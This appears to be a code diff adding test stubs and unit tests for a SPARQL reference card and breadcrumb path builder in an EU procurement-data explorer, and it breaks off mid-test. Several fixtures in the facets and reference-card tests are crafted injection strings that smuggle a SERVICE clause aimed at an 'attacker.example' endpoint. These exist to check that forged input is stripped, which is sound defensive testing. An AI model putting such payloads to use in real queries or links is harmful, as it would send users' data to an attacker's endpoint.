+//     ">", ":scope" — are not parsed and match nothing, so code relying on
+//     them (TreeRenderer.reveal) still needs _children directly.
+//   - closest() walks up through _parent, which appendChild maintains, and
+//     accepts a comma-separated selector list.
+//   - appendChild splices a document fragment's children in, as a real DOM
+//     does, rather than keeping the fragment as a node in the tree.
+//
 // Intentional omissions (add them here when a new test needs them):
-//   - querySelector / querySelectorAll always return null / [] — no
-//     DOM-tree traversal. Tests that want to find child elements should
-//     reach for them through the StubElement's _children array instead.
 //   - no event bubbling — addEventListener stores handlers on each
 //     element but dispatchEvent is not implemented. Simulated clicks
 //     in tests call the handler directly via the controller API.
@@ -107,10 +114,72 @@ class StubElement {
   }
   set innerHTML(v) { this._innerHTML = v; this._children.length = 0; }
   get innerHTML() { return this._innerHTML; }
-  appendChild(child) { this._children.push(child); return child; }
+  appendChild(child) {
+    // A real DOM moves a fragment's children into the parent and leaves the
+    // fragment empty. Keeping the fragment itself as a child instead would
+    // put a node in the tree that no selector can see through, hiding
+    // everything TreeRenderer builds.
+    if (child?.nodeType === 11) {
+      for (const grandchild of child._children) {
+        if (grandchild && typeof grandchild === 'object') grandchild._parent = this;
+        this._children.push(grandchild);
+      }
+      child._children = [];
+      return child;
+    }
+    if (child && typeof child === 'object') child._parent = this;
+    this._children.push(child);
+    return child;
+  }
+
+  // Walks up the tree the way the real one does. TreeRenderer's card handler
+  // calls closest() to decide whether a click landed on a link rather than on
+  // the card itself, so without this the whole click path is untestable.
+  closest(selector) {
+    const selectors = String(selector).split(',').map(s => s.trim()).filter(Boolean);
+    for (let el = this; el; el = el._parent) {
+      if (el.nodeType === 1 && selectors.some(s => el._matchesSelf(s))) return el;
+    }
+    return null;
+  }
+
+  _matchesSelf(selector) {
+    if (selector.startsWith('.')) {
+      const name = selector.slice(1);
+      return this.classList?.contains(name)
+        || String(this.className ?? '').split(/\s+/).includes(name);
+    }
+    if (selector.startsWith('#')) return this.id === selector.slice(1);
+    return this.tagName === selector.toUpperCase();
+  }
   replaceChildren(...children) { this._children = children; }
-  querySelector() { return null; }
-  querySelectorAll() { return []; }
+
+  // Simple selectors only — ".class", "#id" or "tag" — matched against the
+  // element subtree. Combinators (spaces, ">", ":scope") are not supported and
+  // return nothing, as before.
+  //
+  // This exists because TreeRenderer looks its own toggle up with
+  // querySelector during render. With the old always-null stub the render path
+  // threw on the first card, so no test could drive it end to end, and a link
+  // that dropped its navigation context stayed invisible.
+  querySelector(selector) { return this._match(selector)[0] ?? null; }
+  querySelectorAll(selector) { return this._match(selector); }
+
+  _match(selector) {
+    if (typeof selector !== 'string' || /[\s>,]/.test(selector)) return [];
+    const test = (el) => el._matchesSelf(selector);
+
+    const found = [];
+    const walk = (el) => {
+      for (const child of el._children || []) {
+        if (child.nodeType !== 1) continue;
+        if (test(child)) found.push(child);
+        walk(child);
+      }
+    };
+    walk(this);
+    return found;
+  }
   addEventListener(event, handler) {
     if (!this._listeners.has(event)) this._listeners.set(event, []);
     this._listeners.get(event).push(handler);
@@ -118,7 +187,7 @@ class StubElement {
   removeAttribute() {}
   setAttribute() {}
   click() {}
-  get parentElement() { return null; }
+  get parentElement() { return this._parent ?? null; }
   get offsetParent() { return this; }
 }
 
@@ -162,7 +231,50 @@ if (typeof globalThis.document === 'undefined') {
       // just stores it in _children.
       return { nodeType: 3, textContent: String(text), nodeValue: String(text) };
     },
+    createDocumentFragment() {
+      // TreeRenderer builds each subtree into a fragment before attaching it.
+      // A fragment is only ever appended to, so a StubElement carrying the
+      // DOCUMENT_FRAGMENT_NODE type is enough — without this, render() cannot
+      // run under test at all and the recursion has to be stubbed out, which
+      // is precisely where the cycle-marker regression hid.
+      const el = new StubElement(null);
+      el.nodeType = 11;
+      return el;
+    },
   };
+}
+
+// ── Bootstrap shim ─────────────────────────────────────────────────
+//
+// TreeRenderer attaches a Tooltip and a Popover to every reference-card
+// button, from the global Bootstrap bundle the page loads via <script>.
+// Without a stand-in, render() throws on the first card and the whole render
+// path becomes untestable — which is how a link that silently dropped its
+// navigation context went unnoticed.
+//
+// The stubs record what they were asked to show rather than displaying it, so
+// a test can assert on the card's content without a layout engine.
+
+if (typeof globalThis.bootstrap === 'undefined') {
+  class Tooltip {
+    constructor(el, options = {}) { this.el = el; this.options = options; this.enabled = true; }
+    show() {} hide() {}
+    enable() { this.enabled = true; }
+    disable() { this.enabled = false; }
+    dispose() {}
+  }
+  class Popover {
+    constructor(el, options = {}) {
+      this.el = el;
+      this.options = options;
+      this.tip = null;
+      if (el) el._popover = this;
+    }
+    show() { this.shown = true; }
+    hide() { this.shown = false; }
+    dispose() {}
+  }
+  globalThis.bootstrap = { Tooltip, Popover, Tab: class { constructor(el) { this.el = el; } show() {} } };
 }
 
 // ── Reset helper for tests ─────────────────────────────────────────

--- a/test/facets.test.js
+++ b/test/facets.test.js
@@ -19,6 +19,7 @@
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
+import { navigationPath } from '../src/js/utils/navigationPath.js';
 import {
   addUnique,
   createPublicationNumberFacet,
@@ -556,4 +557,86 @@ test('addUnique Symbol-fallback: two malformed facets are never equal', () => {
   const { facets: after1 } = addUnique([], broken1);
   const { facets } = addUnique(after1, broken2);
   assert.equal(facets.length, 2);
+});
+
+// ── session-only route metadata ─────────────────────────────────────
+//
+// Tree clicks record how a resource was reached (viaPath / viaRoot /
+// viaRootPattern) so the SPARQL reference card can rebuild the property path.
+// That describes a live exploration and is deliberately kept out of shareable
+// URLs — so anything arriving over one is forged, and validateFacet is the
+// boundary that has to drop it.
+//
+// viaRootPattern is the dangerous one: the card interpolates it verbatim into
+// the Path row and offers it for copying, so a crafted ?facet= could put a
+// SERVICE clause aimed at an attacker's endpoint in front of a recipient,
+// presented as the app's own suggested query.
+
+const CRAFTED_ROUTE = {
+  viaPath: ['http://data.europa.eu/a4g/ontology#announcesRole'],
+  viaRoot: 'http://data.europa.eu/a4g/resource/id_x_Notice',
+  viaRootPattern: '?evil a epo:Notice . SERVICE <http://attacker.example/collect> { ?s ?p ?o } #',
+};
+
+test('validateFacet strips forged route metadata from a named-node facet', () => {
+  const cleaned = validateFacet({
+    type: 'named-node',
+    term: { termType: 'NamedNode', value: 'http://data.europa.eu/a4g/resource/id_x_Reviewer' },
+    ...CRAFTED_ROUTE,
+  });
+
+  assert.ok(cleaned, 'the facet itself is still valid');
+  for (const field of ['viaPath', 'viaRoot', 'viaRootPattern']) {
+    assert.ok(!(field in cleaned), `${field} does not cross the boundary`);
+  }
+});
+
+test('validateFacet strips route metadata from every facet type', () => {
+  const notice = validateFacet({ type: 'notice-number', value: '00100333-2025', ...CRAFTED_ROUTE });
+  const query = validateFacet({ type: 'query', query: 'SELECT * WHERE { ?s ?p ?o }', ...CRAFTED_ROUTE });
+
+  for (const cleaned of [notice, query]) {
+    assert.ok(cleaned);
+    assert.ok(!('viaRootPattern' in cleaned));
+  }
+});
+
+test('validateFacet keeps the fields it does not know about', () => {
+  // The spread is deliberate — timestamps and future fields must survive.
+  // Only the session-only ones are removed.
+  const cleaned = validateFacet({
+    type: 'notice-number',
+    value: '00100333-2025',
+    timestamp: 12345,
+    somethingElse: 'kept',
+    ...CRAFTED_ROUTE,
+  });
+
+  assert.equal(cleaned.timestamp, 12345);
+  assert.equal(cleaned.somethingElse, 'kept');
+  assert.ok(!('viaPath' in cleaned));
+});
+
+test('validateFacet does not mutate the object it was handed', () => {
+  const input = {
+    type: 'named-node',
+    term: { termType: 'NamedNode', value: 'http://data.europa.eu/a4g/resource/id_x_Reviewer' },
+    ...CRAFTED_ROUTE,
+  };
+  const snapshot = JSON.stringify(input);
+  validateFacet(input);
+  assert.equal(JSON.stringify(input), snapshot);
+});
+
+test('a forged route cannot reach the reference card', () => {
+  // End to end across the boundary: what initFromUrlParams would build from a
+  // crafted ?facet= plus ?root=, handed to the function that rebuilds the path.
+  const validated = validateFacet({
+    type: 'named-node',
+    term: { termType: 'NamedNode', value: 'http://data.europa.eu/a4g/resource/id_x_Reviewer' },
+    ...CRAFTED_ROUTE,
+  });
+  const breadcrumb = [{ type: 'notice-number', value: '00100333-2025' }, validated];
+
+  assert.deepEqual(navigationPath(breadcrumb, 1), { chain: [], anchor: null });
 });

--- a/test/navigationPath.test.js
+++ b/test/navigationPath.test.js
@@ -1,0 +1,202 @@
+/*
+ * Copyright 2026 European Union
+ *
+ * Licensed under the EUPL, Version 1.2 or - as soon they will be approved by the European
+ * Commission - subsequent versions of the EUPL (the "Licence"); You may not use this work except in
+ * compliance with the Licence. You may obtain a copy of the Licence at:
+ * https://joinup.ec.europa.eu/software/page/eupl
+ *
+ * Unless required by applicable law or agreed to in writing, software distributed under the Licence
+ * is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
+ * or implied. See the Licence for the specific language governing permissions and limitations under
+ * the Licence.
+ */
+// navigationPath — reassembles the route the user walked from the
+// breadcrumb, for the Path row on the SPARQL reference card (issue #73).
+//
+// The hazard this guards against is a pattern that parses cleanly but means
+// something false: concatenating chains that do not actually join up produces
+// valid SPARQL asserting a relationship the data never had. Every case below
+// is one where the hops do not join.
+
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { navigationPath } from '../src/js/utils/navigationPath.js';
+
+const NOTICE   = 'http://data.europa.eu/a4g/resource/id_x_Notice';
+const REVIEWER = 'http://data.europa.eu/a4g/resource/id_x_Reviewer_3qDo';
+const ORG      = 'http://data.europa.eu/a4g/resource/id_x_Organisation_ORG-0002';
+const OTHER    = 'http://data.europa.eu/a4g/resource/id_x_ProcurementProcessInformation_5oS2';
+
+const ANNOUNCES_ROLE = 'http://data.europa.eu/a4g/ontology#announcesRole';
+const PLAYED_BY      = 'http://data.europa.eu/a4g/ontology#playedBy';
+const CONCERNS       = 'http://data.europa.eu/a4g/ontology#concernsProcedure';
+const NOTICE_ANCHOR  = '?notice a epo:Notice';
+
+function walk(breadcrumb, breadcrumbIndex = breadcrumb.length - 1) {
+  return navigationPath(breadcrumb, breadcrumbIndex);
+}
+
+// A breadcrumb entry produced by clicking through the tree.
+function hop(target, { viaPath, viaRoot, viaRootPattern = NOTICE_ANCHOR }) {
+  return {
+    type: 'named-node',
+    term: { termType: 'NamedNode', value: target },
+    viaPath, viaRoot, viaRootPattern,
+  };
+}
+
+const noticeSearch = { type: 'notice-number', value: '00100333-2025' };
+
+test('navigationPath returns nothing at the start of an exploration', () => {
+  assert.deepEqual(walk([noticeSearch]), { chain: [], anchor: null });
+});
+
+test('navigationPath returns a single hop with the anchor it started from', () => {
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE }),
+  ]);
+  assert.deepEqual(result, {
+    chain: [ANNOUNCES_ROLE],
+    anchor: NOTICE_ANCHOR,
+  });
+});
+
+test('navigationPath joins consecutive hops that continue from one another', () => {
+  // notice → Reviewer → Organisation. The second hop starts where the first
+  // landed, so the two chains are genuinely one route.
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE }),
+    hop(ORG, { viaPath: [PLAYED_BY], viaRoot: REVIEWER }),
+  ]);
+  assert.deepEqual(result, {
+    chain: [ANNOUNCES_ROLE, PLAYED_BY],
+    anchor: NOTICE_ANCHOR,
+  });
+});
+
+test('navigationPath refuses a hop that starts somewhere the previous one did not land', () => {
+  // The regression this whole mechanism exists to prevent. Concatenating
+  // regardless would claim the notice reaches ORG via announcesRole/playedBy,
+  // when the second hop was actually walked from an unrelated subject.
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE }),
+    hop(ORG, { viaPath: [PLAYED_BY], viaRoot: OTHER }),
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath refuses a chain recorded under a secondary tree root', () => {
+  // Multi-root graphs render several top-level cards. A chain walked beneath
+  // one of them does not start at the notice, even on the very first hop.
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, {
+      viaPath: [CONCERNS],
+      viaRoot: OTHER,
+      viaRootPattern: '?procurementProcessInformation a epo:ProcurementProcessInformation',
+    }),
+  ]);
+  // The route is still true — it just starts somewhere else, and says so.
+  assert.deepEqual(result, {
+    chain: [CONCERNS],
+    anchor: '?procurementProcessInformation a epo:ProcurementProcessInformation',
+  });
+});
+
+test('navigationPath gives up when a hop records no chain at all', () => {
+  // A lateral jump — the procedure timeline — replaces the breadcrumb entry
+  // with one carrying no viaPath. Anything appended after it is anchored to
+  // the wrong subject.
+  const result = walk([
+    noticeSearch,
+    { type: 'named-node', term: { termType: 'NamedNode', value: REVIEWER } },
+    hop(ORG, { viaPath: [PLAYED_BY], viaRoot: REVIEWER }),
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath gives up when the starting hop names no anchor pattern', () => {
+  // Without a pattern binding the root there is nothing to hang the chain on.
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE, viaRootPattern: null }),
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath ignores forward history after stepping back', () => {
+  // Going back shortens the displayed path; the abandoned forward entries
+  // must not leak into it.
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE }),
+    hop(ORG, { viaPath: [PLAYED_BY], viaRoot: REVIEWER }),
+  ], 1);
+  assert.deepEqual(result, {
+    chain: [ANNOUNCES_ROLE],
+    anchor: NOTICE_ANCHOR,
+  });
+});
+
+test('navigationPath tolerates an empty breadcrumb', () => {
+  assert.deepEqual(walk([], -1), { chain: [], anchor: null });
+});
+
+// ── malformed input ─────────────────────────────────────────────────
+//
+// validateFacet() spreads unknown fields without inspecting them, so nothing
+// upstream guarantees these shapes. The failure mode without checking is not a
+// crash but a plausible-looking query built from nonsense, which is worse.
+
+test('navigationPath rejects a viaPath that is a string rather than an array', () => {
+  // Spreading a string yields one entry per character, and the card would
+  // offer "<a> / <b> / <c>" as though it were a real property path.
+  const result = walk([
+    noticeSearch,
+    { ...hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE }), viaPath: 'abc' },
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath rejects a viaPath holding anything but strings', () => {
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE, null], viaRoot: NOTICE }),
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath rejects a non-string anchor', () => {
+  // Assembling the pattern calls anchor.startsWith, which would throw.
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: NOTICE, viaRootPattern: 42 }),
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath rejects a non-string viaRoot', () => {
+  const result = walk([
+    noticeSearch,
+    hop(REVIEWER, { viaPath: [ANNOUNCES_ROLE], viaRoot: { value: NOTICE } }),
+  ]);
+  assert.deepEqual(result, { chain: [], anchor: null });
+});
+
+test('navigationPath tolerates a breadcrumb that is not an array', () => {
+  assert.deepEqual(navigationPath(null, 3), { chain: [], anchor: null });
+  assert.deepEqual(navigationPath(undefined, 0), { chain: [], anchor: null });
+  assert.deepEqual(navigationPath('not a breadcrumb', 2), { chain: [], anchor: null });
+});
+
+test('navigationPath never hands back a shared empty result to mutate', () => {
+  // The no-path result is a frozen singleton; a caller pushing onto its chain
+  // would otherwise corrupt every later call.
+  const a = walk([noticeSearch]);
+  a.chain.push?.('x');
+  assert.deepEqual(walk([noticeSearch]).chain, [], 'still empty for the next caller');
+});

--- a/test/referenceCardSparql.test.js
+++ b/test/referenceCardSparql.test.js
@@ -1,0 +1,392 @@
+/*
+ * Copyright 2026 European Union
+ *
+ * Licensed under the EUPL, Version 1.2 or - as soon they will be approved by the European
+ * Commission - subsequent versions of the EUPL (the "Licence"); You may not use this work except in
+ * compliance with the Licence. You may obtain a copy of the Licence at:
+ * https://joinup.ec.europa.eu/software/page/eupl
+ *
+ * Unless required by applicable law or agreed to in writing, software distributed under the Licence
+ * is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
+ * or implied. See the Licence for the specific language governing permissions and limitations under
+ * the Licence.
+ */
+// The SPARQL reference card promises "use the following in your SPARQL
+// query". This file holds it to that promise, for every shape of resource the
+// tree can render — by handing what the card offers to a real SPARQL parser
+// rather than comparing it against a string somebody expected.
+//
+// Two things have to hold, and the second is the one string comparison keeps
+// missing: what the card offers must PARSE, and the prefixes it declares must
+// COVER what its rows use. A Path that walks epo: predicates to a skos:
+// Concept needs both declared; a card that only declares the target's own
+// prefix hands the user something that fails the moment they paste it into an
+// empty query.
+//
+// Each case below is a resource shape, not a fix for a reported bug, so the
+// matrix keeps covering combinations nobody has thought to report yet.
+
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { Parser } from 'sparqljs';
+import './_helpers.js';
+import { TreeRenderer } from '../src/js/TreeRenderer.js';
+
+const EPO   = 'http://data.europa.eu/a4g/ontology#';
+const SKOS  = 'http://www.w3.org/2004/02/skos/core#';
+const M8G   = 'http://data.europa.eu/m8g/';
+const RDF_TYPE = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#type';
+
+const NOTICE   = 'http://data.europa.eu/a4g/resource/id_x_Notice';
+const REVIEWER = 'http://data.europa.eu/a4g/resource/id_x_Reviewer_3qDo';
+const CONCEPT  = 'http://publications.europa.eu/resource/authority/cpv/45000000';
+
+const NOTICE_ANCHOR = '?notice a epo:Notice';
+
+// ── harness ─────────────────────────────────────────────────────────
+
+function namedNode(value) { return { termType: 'NamedNode', value }; }
+function blankNode(value) { return { termType: 'BlankNode', value }; }
+function quad(subject, predicate, object) {
+  return { subject, predicate: namedNode(predicate), object };
+}
+
+// Render the card for one resource, in the state a given navigation would
+// leave the renderer in.
+function card({ subject, blank = false, types = [], chain = [], anchor = null }) {
+  const r = new TreeRenderer({ innerHTML: '', appendChild() {} });
+  const subjectTerm = blank ? blankNode(subject) : namedNode(subject);
+
+  const quads = types.length
+    ? types.map(t => quad(subjectTerm, RDF_TYPE, namedNode(t)))
+    : [quad(subjectTerm, `${EPO}someProperty`, { termType: 'Literal', value: 'x' })];
+
+  r.subjectIndex = r._buildIndex(quads);
+  r._navigatedSubject = subject;
+  r._pathFromRoot = chain;
+  r._rootPattern = anchor;
+
+  return r._buildInfoRows(subject, r.subjectIndex.get(subject));
+}
+
+const unescape = (s) => s
+  .replace(/&lt;/g, '<').replace(/&gt;/g, '>')
+  .replace(/&quot;/g, '"').replace(/&amp;/g, '&');
+
+// The values the copy buttons actually put on the clipboard — what the user
+// ends up pasting, rather than what the card happens to display.
+function rowsOf(html) {
+  const re = /<span class="tree-info-label">([^<]*)<\/span><button class="tree-info-copy-inline" data-copy="([^"]*)"/g;
+  const rows = [];
+  let m;
+  while ((m = re.exec(html)) !== null) rows.push({ label: m[1], value: unescape(m[2]) });
+  return rows;
+}
+
+const valuesFor = (rows, label) => rows.filter(r => r.label === label).map(r => r.value);
+
+function parses(query) {
+  try {
+    new Parser().parse(query);
+    return null;
+  } catch (err) {
+    return err.message;
+  }
+}
+
+// The card's central promise: its declarations plus any one of its patterns
+// form a query that parses on its own, with nothing else supplied.
+function assertCardIsUsable(html, description) {
+  const rows = rowsOf(html);
+  const prefixes = valuesFor(rows, 'Prefix').join('\n');
+
+  for (const path of valuesFor(rows, 'Path')) {
+    const query = `${prefixes}\nSELECT * WHERE { ${path} }`;
+    assert.equal(parses(query), null, `${description} — Path does not parse:\n${query}`);
+  }
+
+  for (const name of valuesFor(rows, 'Name')) {
+    const query = `${prefixes}\nSELECT * WHERE { ?s a ${name} }`;
+    assert.equal(parses(query), null, `${description} — Name does not parse:\n${query}`);
+  }
+
+  for (const iri of valuesFor(rows, 'IRI')) {
+    const query = `${prefixes}\nSELECT * WHERE { ${iri} ?p ?o }`;
+    assert.equal(parses(query), null, `${description} — IRI does not parse:\n${query}`);
+  }
+
+  return rows;
+}
+
+
+// Parse what the card offers and inspect the result, rather than grepping the
+// text. A hostile URI keeps its scary-looking words after percent-encoding —
+// "SERVICE" survives inside <…%20SERVICE%20…> — but as inert characters in a
+// single IRI. What must never happen is those words becoming query structure,
+// so the assertion is about the shape the parser produces.
+function assertNoExtraClauses(rows, description) {
+  const prefixes = valuesFor(rows, 'Prefix').join('\n');
+  const patterns = [
+    ...valuesFor(rows, 'Path'),
+    ...valuesFor(rows, 'Name').map(n => `?typed a ${n} .`),
+    ...valuesFor(rows, 'IRI').map(i => `${i} ?p ?o .`),
+  ];
+
+  for (const pattern of patterns) {
+    const query = `${prefixes}\nSELECT * WHERE { ${pattern} }`;
+    const parsed = new Parser().parse(query);
+    const kinds = [...new Set(parsed.where.map(w => w.type))];
+    assert.deepEqual(kinds, ['bgp'], `${description}: expected only triple patterns, got ${kinds}`);
+  }
+
+  // Every IRI the card offers has to be exactly one IRIREF — nothing that
+  // closes its own brackets and starts something new.
+  for (const iri of valuesFor(rows, 'IRI')) {
+    assert.match(iri, /^<[^<>\s]*>$/, `${description}: the IRI row is a single IRIREF`);
+  }
+}
+
+// ── the harness has to be able to fail ──────────────────────────────
+
+test('the parser rejects the mistakes this suite exists to catch', () => {
+  assert.notEqual(parses('SELECT * WHERE { <urn:a> ; epo:x ?v }'), null, 'leading semicolon');
+  assert.notEqual(parses('SELECT * WHERE { ?s a http://example.org/T }'), null, 'unbracketed IRI');
+  assert.notEqual(parses('SELECT * WHERE { ?some-Type a ?t }'), null, 'illegal variable name');
+  assert.notEqual(parses('SELECT * WHERE { ?s epo:x ?v }'), null, 'undeclared prefix');
+  assert.equal(parses('PREFIX epo: <http://data.europa.eu/a4g/ontology#>\nSELECT * WHERE { ?s epo:x ?v }'), null);
+});
+
+// ── the resource shapes the tree can render ─────────────────────────
+
+const CASES = [
+  {
+    name: 'typed resource at the start of an exploration',
+    input: { subject: NOTICE, types: [`${EPO}Notice`] },
+  },
+  {
+    name: 'one hop walked from a notice',
+    input: { subject: REVIEWER, types: [`${EPO}Reviewer`], chain: [`${EPO}announcesRole`], anchor: NOTICE_ANCHOR },
+  },
+  {
+    name: 'several hops walked from a notice',
+    input: {
+      subject: REVIEWER, types: [`${EPO}Reviewer`], anchor: NOTICE_ANCHOR,
+      chain: [`${EPO}announcesRole`, `${EPO}playedBy`, `${EPO}hasLegalName`],
+    },
+  },
+  {
+    name: 'route ending at a term from a different vocabulary',
+    // The reported case: an ePO anchor and ePO predicates landing on a
+    // skos:Concept. Two prefixes are in play and both must be declared.
+    input: {
+      subject: CONCEPT, types: [`${SKOS}Concept`], anchor: NOTICE_ANCHOR,
+      chain: [`${EPO}refersToLot`, `${EPO}hasPurpose`, `${EPO}hasMainClassification`],
+    },
+    expect: (rows) => {
+      const declared = valuesFor(rows, 'Prefix').join(' ');
+      assert.ok(declared.includes('PREFIX epo:'), 'epo declared for the path');
+      assert.ok(declared.includes('PREFIX skos:'), 'skos declared for the type');
+    },
+  },
+  {
+    name: 'route mixing vocabularies within the chain itself',
+    input: {
+      subject: REVIEWER, types: [`${EPO}Reviewer`], anchor: NOTICE_ANCHOR,
+      chain: [`${EPO}announcesRole`, `${M8G}address`, `${SKOS}prefLabel`],
+    },
+    expect: (rows) => {
+      const declared = valuesFor(rows, 'Prefix').join(' ');
+      for (const p of ['epo', 'm8g', 'skos']) {
+        assert.ok(declared.includes(`PREFIX ${p}:`), `${p} declared`);
+      }
+    },
+  },
+  {
+    name: 'anchor that is an IRI rather than a variable binding',
+    input: { subject: REVIEWER, types: [`${EPO}Reviewer`], chain: [`${EPO}announcesRole`], anchor: `<${NOTICE}>` },
+  },
+  {
+    name: 'resource with several declared types',
+    input: { subject: NOTICE, types: [`${EPO}Notice`, `${EPO}CompetitionNotice`, `${EPO}Notice16`] },
+  },
+  {
+    name: 'untyped resource',
+    input: { subject: REVIEWER },
+  },
+  {
+    name: 'untyped blank node',
+    input: { subject: 'b0_b0', blank: true },
+    expect: (rows) => {
+      assert.equal(valuesFor(rows, 'Path').length, 0, 'nothing to offer, so nothing offered');
+      assert.equal(valuesFor(rows, 'IRI').length, 0, 'a blank label is not an IRI');
+    },
+  },
+  {
+    name: 'typed blank node',
+    input: { subject: 'b1_b1', blank: true, types: [`${EPO}Reviewer`] },
+    expect: (rows) => {
+      assert.equal(valuesFor(rows, 'Path').length, 1, 'a type is enough to match on');
+      assert.equal(valuesFor(rows, 'IRI').length, 0);
+    },
+  },
+  {
+    name: 'type from a namespace the app does not know',
+    input: { subject: REVIEWER, types: ['http://example.org/Some-Type'] },
+  },
+  {
+    name: 'known namespace whose local part contains a slash',
+    input: { subject: REVIEWER, types: ['http://schema.org/foo/bar'] },
+  },
+  {
+    name: 'known namespace whose local part contains a space',
+    input: { subject: REVIEWER, types: ['http://purl.org/dc/terms/a b'] },
+  },
+  {
+    name: 'local part ending in a dot',
+    input: { subject: REVIEWER, types: ['http://schema.org/foo.'] },
+  },
+  {
+    name: 'local part starting with a digit',
+    input: { subject: REVIEWER, types: ['http://schema.org/123'] },
+  },
+  {
+    name: 'predicate in the chain from an unknown namespace',
+    input: {
+      subject: REVIEWER, types: [`${EPO}Reviewer`], anchor: NOTICE_ANCHOR,
+      chain: [`${EPO}announcesRole`, 'http://example.org/custom#links/to'],
+    },
+  },
+  {
+    name: 'subject IRI containing a space',
+    // Angle brackets do not rescue this — IRIREF excludes space outright.
+    input: { subject: 'http://data.europa.eu/a4g/resource/id x_Notice', types: [`${EPO}Notice`] },
+  },
+  {
+    name: 'subject IRI containing angle brackets and a backslash',
+    input: { subject: 'http://ex.org/a<b>c\\d', types: [`${EPO}Notice`] },
+  },
+  {
+    name: 'type that is exactly a known namespace, with an empty local part',
+    input: { subject: REVIEWER, types: ['http://schema.org/'] },
+  },
+  {
+    name: 'type whose local part is non-ASCII',
+    input: { subject: REVIEWER, types: ['http://schema.org/Ünicode'] },
+  },
+  {
+    name: 'rdf:type appearing inside the walked chain',
+    input: {
+      subject: REVIEWER, types: [`${EPO}Reviewer`], anchor: NOTICE_ANCHOR,
+      chain: [`${EPO}announcesRole`, RDF_TYPE],
+    },
+  },
+  {
+    name: 'a deep chain',
+    input: {
+      subject: REVIEWER, types: [`${EPO}Reviewer`], anchor: NOTICE_ANCHOR,
+      chain: Array.from({ length: 12 }, (_, i) => `${EPO}hop${i}`),
+    },
+  },
+  {
+    name: 'type named Value, colliding with the fallback variable',
+    input: { subject: REVIEWER, types: ['http://schema.org/Value'], anchor: '?value a schema:Value', chain: [`${EPO}announcesRole`] },
+  },
+  {
+    name: 'navigating from a notice to another notice',
+    input: { subject: NOTICE, types: [`${EPO}Notice`], anchor: NOTICE_ANCHOR, chain: [`${EPO}refersToPrevious`] },
+  },
+  {
+    name: 'chain using prefixes that are string-prefixes of other prefixes',
+    // rdf/rdfs, dct/dcterms, epo/epo_shape, sh/shacl all share a stem. A
+    // declaration derived by loose matching would declare the short one for
+    // the long one's use, and the query would then fail on the real prefix.
+    // The anchor deliberately avoids epo:, so the only thing that could put
+    // "epo" on the card is loose matching against epo_shape:.
+    input: {
+      subject: REVIEWER, types: ['http://www.w3.org/2000/01/rdf-schema#Class'],
+      anchor: '?class a rdfs:Class',
+      chain: ['http://www.w3.org/2000/01/rdf-schema#label', 'http://data.europa.eu/a4g/data-shape#note'],
+    },
+    expect: (rows) => {
+      const declared = valuesFor(rows, 'Prefix').map(d => d.slice('PREFIX '.length, d.indexOf(':')));
+      assert.ok(declared.includes('rdfs'), 'rdfs declared');
+      assert.ok(declared.includes('epo_shape'), 'epo_shape declared');
+      assert.ok(!declared.includes('rdf'), 'rdf not declared off the back of rdfs');
+      assert.ok(!declared.includes('epo'), 'epo not declared off the back of epo_shape');
+    },
+  },
+  {
+    name: 'type URI crafted to break out of its angle brackets',
+    // The card is built from RDF the endpoint returns. That is a second
+    // untrusted source, and a resource typed with a URI shaped like SPARQL
+    // would otherwise smuggle a clause into the pattern the user copies.
+    input: { subject: REVIEWER, types: ['http://ex.org/T> . SERVICE <http://attacker.example/x'] },
+    expect: (rows) => {
+      const offered = [...valuesFor(rows, 'Path'), ...valuesFor(rows, 'Name')].join('\n');
+      assert.ok(!offered.includes('SERVICE <http'), 'no clause escapes into the pattern');
+    },
+  },
+  {
+    name: 'predicate in the chain crafted to break out',
+    input: {
+      subject: REVIEWER, types: [`${EPO}Reviewer`], anchor: NOTICE_ANCHOR,
+      chain: [`${EPO}announcesRole`, 'http://ex.org/p> . ?x ?y ?z . #'],
+    },
+    expect: (rows) => {
+      const path = valuesFor(rows, 'Path').join('\n');
+      assert.ok(!path.includes('> . ?x'), 'no clause escapes into the property path');
+    },
+  },
+  {
+    name: 'subject IRI crafted to break out of the IRI row',
+    input: { subject: 'http://ex.org/s> . SERVICE <http://attacker.example/x', types: [`${EPO}Reviewer`] },
+    expect: (rows) => assertNoExtraClauses(rows, 'crafted subject'),
+  },
+  {
+    name: 'vocabulary term as the subject',
+    input: { subject: `${EPO}Notice` },
+  },
+  {
+    name: 'vocabulary term whose local part cannot be a prefixed name',
+    input: { subject: 'http://schema.org/foo/bar' },
+  },
+];
+
+for (const { name, input, expect } of CASES) {
+  test(`card is usable: ${name}`, () => {
+    const rows = assertCardIsUsable(card(input), name);
+    if (expect) expect(rows);
+  });
+}
+
+// ── the whole card at once ──────────────────────────────────────────
+
+test('every declared prefix and every pattern coexist in one query', () => {
+  // Paste the entire card in, not one row at a time.
+  for (const { name, input } of CASES) {
